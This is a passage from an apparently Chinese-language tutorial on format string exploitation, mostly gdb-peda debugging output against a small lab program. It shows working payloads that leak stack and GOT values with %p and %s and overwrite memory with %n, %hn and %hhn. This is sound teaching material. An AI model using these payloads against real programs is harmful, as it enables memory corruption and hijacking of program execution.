ESP: 0xffffd550 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
EIP: 0x56555642 (<main+133>: call 0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x56555638 <main+123>: push DWORD PTR [ebp-0xc]
0x5655563b <main+126>: lea eax,[ebp-0x94]
0x56555641 <main+132>: push eax
=> 0x56555642 <main+133>: call 0x56555430 <printf@plt>
0x56555647 <main+138>: add esp,0x20
0x5655564a <main+141>: sub esp,0xc
0x5655564d <main+144>: push 0xa
0x5655564f <main+146>: call 0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>: add ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()
格式字符串的地址在 0xffffd584
,从下面的输出中可以看到它们在栈中是怎样排布的:
gdb-peda$ x/20w $esp
0xffffd550: 0xffffd584 0x00000001 0x88888888 0xffffffff
0xffffd560: 0xffffd57a 0xffffd584 0x56555220 0x565555d7
0xffffd570: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
0xffffd580: 0x00000000 0x41414141 0x2e70252e 0x252e7025
0xffffd590: 0x70252e70 0x2e70252e 0x252e7025 0x70252e70
gdb-peda$ x/20wb 0xffffd584
0xffffd584: 0x41 0x41 0x41 0x41 0x2e 0x25 0x70 0x2e
0xffffd58c: 0x25 0x70 0x2e 0x25 0x70 0x2e 0x25 0x70
0xffffd594: 0x2e 0x25 0x70 0x2e
gdb-peda$ python print('\x2e\x25\x70')
.%p
下面是程序运行的结果:
gdb-peda$ c
Continuing.
AAAA.0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584.0x56555220.0x565555d7.0xf7ffda54.0x1.0x424135d0.0x4443.(nil).0x41414141.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
0x41414141
是输出的第 13 个字符,所以我们使用 %13$s
即可读出 0x41414141
处的内容,当然,这里可能是一个不合法的地址。下面我们把 0x41414141
换成我们需要的合法的地址,比如字符串 ABCD
的地址 0xffffd57a
:
$ python2 -c 'print("\x7a\xd5\xff\xff"+".%13$s")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 --> 0xffffd57a ("ABCD")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd54c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd54c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd550 --> 0xffffd584 --> 0xffffd57a ("ABCD")
0008| 0xffffd554 --> 0x1
0012| 0xffffd558 --> 0x88888888
0016| 0xffffd55c --> 0xffffffff
0020| 0xffffd560 --> 0xffffd57a ("ABCD")
0024| 0xffffd564 --> 0xffffd584 --> 0xffffd57a ("ABCD")
0028| 0xffffd568 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20w $esp
0xffffd54c: 0x08048520 0xffffd584 0x00000001 0x88888888
0xffffd55c: 0xffffffff 0xffffd57a 0xffffd584 0x080481fc
0xffffd56c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd57c: 0x00004443 0x00000000 0xffffd57a 0x3331252e
0xffffd58c: 0x00007324 0xffffd5ca 0x00000001 0x000000c2
gdb-peda$ x/s 0xffffd57a
0xffffd57a: "ABCD"
gdb-peda$ c
Continuing.
z���.ABCD
当然这也没有什么用,我们真正经常用到的地方是,把程序中某函数的 GOT 地址传进去,然后获得该地址所对应的函数的虚拟地址。然后根据函数在 libc 中的相对位置,计算出我们需要的函数地址(如 system()
)。如下面展示的这样:
先看一下重定向表:
$ readelf -r a.out
Relocation section '.rel.dyn' at offset 0x2e8 contains 1 entries:
Offset Info Type Sym.Value Sym. Name
08049ffc 00000206 R_386_GLOB_DAT 00000000 __gmon_start__
Relocation section '.rel.plt' at offset 0x2f0 contains 4 entries:
Offset Info Type Sym.Value Sym. Name
0804a00c 00000107 R_386_JUMP_SLOT 00000000 printf@GLIBC_2.0
0804a010 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0
0804a014 00000407 R_386_JUMP_SLOT 00000000 putchar@GLIBC_2.0
0804a018 00000507 R_386_JUMP_SLOT 00000000 __isoc99_scanf@GLIBC_2.7
.rel.plt
中有四个函数可供我们选择,按理说选择任意一个都没有问题,但是在实践中我们会发现一些问题。下面的结果分别是 printf
、__libc_start_main
、putchar
和 __isoc99_scanf
:
$ python2 -c 'print("\x0c\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffe22cfa.0xffe22d04.0x80481fc.0x80484b0.0xf77afa54.0x1.0x424155d0.0x4443.(nil).0x2e0804a0.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025
$ python2 -c 'print("\x10\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffd439ba.0xffd439c4.0x80481fc.0x80484b0.0xf77b6a54.0x1.0x4241c5d0.0x4443.(nil).0x804a010.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
$ python2 -c 'print("\x14\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffcc17aa.0xffcc17b4.0x80481fc.0x80484b0.0xf7746a54.0x1.0x4241c5d0.0x4443.(nil).0x804a014.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
$ python2 -c 'print("\x18\xa0\x04\x08"+".%p"*20)' | ./a.out
▒.0x1.0x88888888.0xffffffff.0xffcb99aa.0xffcb99b4.0x80481fc.0x80484b0.0xf775ca54.0x1.0x424125d0.0x4443.(nil).0x804a018.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
细心一点你就会发现第一个(printf
)的结果有问题。我们输入了 \x0c\xa0\x04\x08
(0x0804a00c
),可是 13 号位置输出的结果却是 0x2e0804a0
,那么,\x0c
哪去了,查了一下 ASCII 表:
Oct Dec Hex Char
──────────────────────────────────────
014 12 0C FF '\f' (form feed)
于是就被省略了,同样会被省略的还有很多,如 \x07
('\a')、\x08
('\b')、\x20
(SPACE)等的不可见字符都会被省略。这就会让我们后续的操作出现问题。所以这里我们选用最后一个(__isoc99_scanf
)。
$ python2 -c 'print("\x18\xa0\x04\x08"+"%13$s")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push ebp)
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd54c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd54c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd550 --> 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push ebp)
0008| 0xffffd554 --> 0x1
0012| 0xffffd558 --> 0x88888888
0016| 0xffffd55c --> 0xffffffff
0020| 0xffffd560 --> 0xffffd57a ("ABCD")
0024| 0xffffd564 --> 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push ebp)
0028| 0xffffd568 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20w $esp
0xffffd54c: 0x08048520 0xffffd584 0x00000001 0x88888888
0xffffd55c: 0xffffffff 0xffffd57a 0xffffd584 0x080481fc
0xffffd56c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd57c: 0x00004443 0x00000000 0x0804a018 0x24333125
0xffffd58c: 0x00f00073 0xffffd5ca 0x00000001 0x000000c2
gdb-peda$ x/w 0x804a018
0x804a018: 0xf7e3a790
gdb-peda$ c
Continuing.
▒����
虽然我们可以通过 x/w
指令得到 __isoc99_scanf
函数的虚拟地址 0xf7e3a790
。但是由于 0x804a018
处的内容是仍然一个指针,使用 %13$s
打印并不成功。在下面的内容中将会介绍怎样借助 pwntools 的力量,来获得正确格式的虚拟地址,并能够对它有进一步的利用。
当然并非总能通过使用 4 字节的跳转(如 AAAA
)来步进参数指针去引用格式字符串的起始部分,有时,需要在格式字符串之前加一个、两个或三个字符的前缀来实现一系列的 4 字节跳转。
覆盖栈内容
现在我们已经可以读取栈上和任意地址的内存了,接下来我们更进一步,通过修改栈和内存来劫持程序的执行流程。%n
转换指示符将 %n
当前已经成功写入流或缓冲区中的字符个数存储到地址由参数指定的整数中。
#include<stdio.h>
void main() {
int i;
char str[] = "hello";
printf("%s %n\n", str, &i);
printf("%d\n", i);
}
$ ./a.out
hello
6
i
被赋值为 6,因为在遇到转换指示符之前一共写入了 6 个字符(hello
加上一个空格)。在没有长度修饰符时,默认写入一个 int
类型的值。
通常情况下,我们要需要覆写的值是一个 shellcode 的地址,而这个地址往往是一个很大的数字。这时我们就需要通过使用具体的宽度或精度的转换规范来控制写入的字符个数,即在格式字符串中加上一个十进制整数来表示输出的最小位数,如果实际位数大于定义的宽度,则按实际位数输出,反之则以空格或 0 补齐(0
补齐时在宽度前加点.
或 0
)。如:
#include<stdio.h>
void main() {
int i;
printf("%10u%n\n", 1, &i);
printf("%d\n", i);
printf("%.50u%n\n", 1, &i);
printf("%d\n", i);
printf("%0100u%n\n", 1, &i);
printf("%d\n", i);
}
$ ./a.out
1
10
00000000000000000000000000000000000000000000000001
50
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001
100
就是这样,下面我们把地址 0x8048000
写入内存:
printf("%0134512640d%n\n", 1, &i);
$ ./a.out
...
0x8048000
还是我们一开始的程序,我们尝试将 arg2
的值更改为任意值(比如 0x00000020
,十进制 32),在 gdb 中可以看到得到 arg2
的地址 0xffffd538
,那么我们构造格式字符串 \x38\xd5\xff\xff%08x%08x%012d%13$n
,其中 \x38\xd5\xff\xff
表示 arg2
的地址,占 4 字节,%08x%08x
表示两个 8 字符宽的十六进制数,占 16 字节,%012d
占 12 字节,三个部分加起来就占了 4+16+12=32 字节,即把 arg2
赋值为 0x00000020
。格式字符串最后一部分 %13$n
也是最重要的一部分,和上面的内容一样,表示格式字符串的第 13 个参数,即写入 0xffffd538
的地方(0xffffd564
),printf()
就是通过这个地址找到被覆盖的内容的:
$ python2 -c 'print("\x38\xd5\xff\xff%08x%08x%012d%13$n")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd55c: 0x00004443 0x00000000 0xffffd538 0x78383025
0xffffd56c: 0x78383025 0x32313025 0x33312564 0x00006e24
gdb-peda$ finish
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x20 (' ')
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
EIP: 0x8048520 (<main+138>: add esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048514 <main+126>: lea eax,[ebp-0x94]
0x804851a <main+132>: push eax
0x804851b <main+133>: call 0x8048350 <printf@plt>
=> 0x8048520 <main+138>: add esp,0x20
0x8048523 <main+141>: sub esp,0xc
0x8048526 <main+144>: push 0xa
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
0x804852d <main+151>: add esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x20 (' ')
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530: 0xffffd564 0x00000001 0x00000020 0xffffffff
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
0xffffd560: 0x00000000 0xffffd538 0x78383025 0x78383025
0xffffd570: 0x32313025 0x33312564 0x00006e24 0xf7e70240
对比 printf()
函数执行前后的输出,printf
首先解析 %13$n
找到获得地址 0xffffd564
的值 0xffffd538
,然后跳转到地址 0xffffd538
,将它的值 0x88888888
覆盖为 0x00000020
,就得到 arg2=0x00000020
。
覆盖任意地址内存
也许已经有人发现了一个问题,使用上面覆盖内存的方法,值最小只能是 4,因为单单地址就占去了 4 个字节。那么我们怎样覆盖比 4 小的值呢。利用整数溢出是一个方法,但是在实践中这样做基本都不会成功。再想一下,前面的输入中,地址都位于格式字符串之前,这样做真的有必要吗,能否将地址放在中间。我们来试一下,使用格式字符串 "AA%15$nA"+"\x38\xd5\xff\xff"
,开头的 AA
占两个字节,即将地址赋值为 2
,中间是 %15$n
占 5 个字节,这里不是 %13$n
,因为地址被我们放在了后面,在格式字符串的第 15 个参数,后面跟上一个 A
占用一个字节。于是前半部分总共占用了 2+5+1=8 个字节,刚好是两个参数的宽度,这里的 8 字节对齐十分重要。最后再输入我们要覆盖的地址 \x38\xd5\xff\xff
,详细输出如下:
$ python2 -c 'print("AA%15$nA"+"\x38\xd5\xff\xff")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 ("AA%15$nA8\325\377\377")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd55c: 0x00004443 0x00000000 0x31254141 0x416e2435
0xffffd56c: 0xffffd538 0xffffd500 0x00000001 0x000000c2
gdb-peda$ finish
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x7
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
EIP: 0x8048520 (<main+138>: add esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048514 <main+126>: lea eax,[ebp-0x94]
0x804851a <main+132>: push eax
0x804851b <main+133>: call 0x8048350 <printf@plt>
=> 0x8048520 <main+138>: add esp,0x20
0x8048523 <main+141>: sub esp,0xc
0x8048526 <main+144>: push 0xa
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
0x804852d <main+151>: add esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x2
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530: 0xffffd564 0x00000001 0x00000002 0xffffffff
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
0xffffd560: 0x00000000 0x31254141 0x416e2435 0xffffd538
0xffffd570: 0xffffd500 0x00000001 0x000000c2 0xf7e70240
对比 printf()
函数执行前后的输出,可以看到我们成功地给 arg2
赋值了 0x00000002
。
说完了数字小于 4 时的覆盖,接下来说说大数字的覆盖。前面的方法教我们直接输入一个地址的十进制就可以进行赋值,可是,这样占用的内存空间太大,往往会覆盖掉其他重要的地址而产生错误。其实我们可以通过长度修饰符来更改写入的值的大小:
char c;
short s;
int i;
long l;
long long ll;
printf("%s %hhn\n", str, &c); // 写入单字节
printf("%s %hn\n", str, &s); // 写入双字节
printf("%s %n\n", str, &i); // 写入4字节
printf("%s %ln\n", str, &l); // 写入8字节
printf("%s %lln\n", str, &ll); // 写入16字节
试一下:
$ python2 -c 'print("A%15$hhn"+"\x38\xd5\xff\xff")' > text
0xffffd530: 0xffffd564 0x00000001 0x88888801 0xffffffff
$ python2 -c 'print("A%15$hnA"+"\x38\xd5\xff\xff")' > text
0xffffd530: 0xffffd564 0x00000001 0x88880001 0xffffffff
$ python2 -c 'print("A%15$nAA"+"\x38\xd5\xff\xff")' > text
0xffffd530: 0xffffd564 0x00000001 0x00000001 0xffffffff
于是,我们就可以逐字节地覆盖,从而大大节省了内存空间。这里我们尝试写入 0x12345678
到地址 0xffffd538
,首先使用 AAAABBBBCCCCDDDD
作为输入:
gdb-peda$ r
AAAABBBBCCCCDDDD
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 ("AAAABBBBCCCCDDDD")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd530 --> 0xffffd564 ("AAAABBBBCCCCDDDD")
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 ("AAAABBBBCCCCDDDD")
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd55c: 0x00004443 0x00000000 0x41414141 0x42424242
0xffffd56c: 0x43434343 0x44444444 0x00000000 0x000000c2
gdb-peda$ x/4wb 0xffffd538
0xffffd538: 0x88 0x88 0x88 0x88
由于我们想要逐字节覆盖,就需要 4 个用于跳转的地址,4 个写入地址和 4 个值,对应关系如下(小端序):
0xffffd564 -> 0x41414141 (0xffffd538) -> \x78
0xffffd568 -> 0x42424242 (0xffffd539) -> \x56
0xffffd56c -> 0x43434343 (0xffffd53a) -> \x34
0xffffd570 -> 0x44444444 (0xffffd53b) -> \x12
把 AAAA
、BBBB
、CCCC
、DDDD
占据的地址分别替换成括号中的值,再适当使用填充字节使 8 字节对齐就可以了。构造输入如下:
$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text
其中前四个部分是 4 个写入地址,占 4*4=16 字节,后面四个部分分别用于写入十六进制数,由于使用了 hh
,所以只会保留一个字节 0x78
(16+104=120 -> 0x78)、0x56
(120+222=342 -> 0x0156 -> 0x56)、0x34
(342+222=564 -> 0x0234 -> 0x34)、0x12
(564+222=786 -> 0x312 -> 0x12)。执行结果如下:
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
Starting program: /home/firmy/Desktop/RE4B/a.out < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7e27c1b <fprintf+27>: ret
0xf7e27c1c: xchg ax,ax
0xf7e27c1e: xchg ax,ax
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
0xf7e27c25 <printf+5>: add eax,0x16f243
0xf7e27c2a <printf+10>: sub esp,0xc
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
